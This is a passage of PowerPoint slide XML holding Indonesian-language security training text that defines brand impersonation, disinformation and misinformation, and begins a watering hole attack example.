            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Merek dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Disinformasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengerahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menduplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> logo dan format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>huruf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>warna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paragraf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>judul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tajuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> visual. Aktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meniru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencarian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>realistis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Taktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menautkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencarian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menipu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengulangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maksud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menipu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kampanye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berusaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengulangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fakta-fakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Watering Hole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> watering hole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs e-commerce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>internasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pizza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
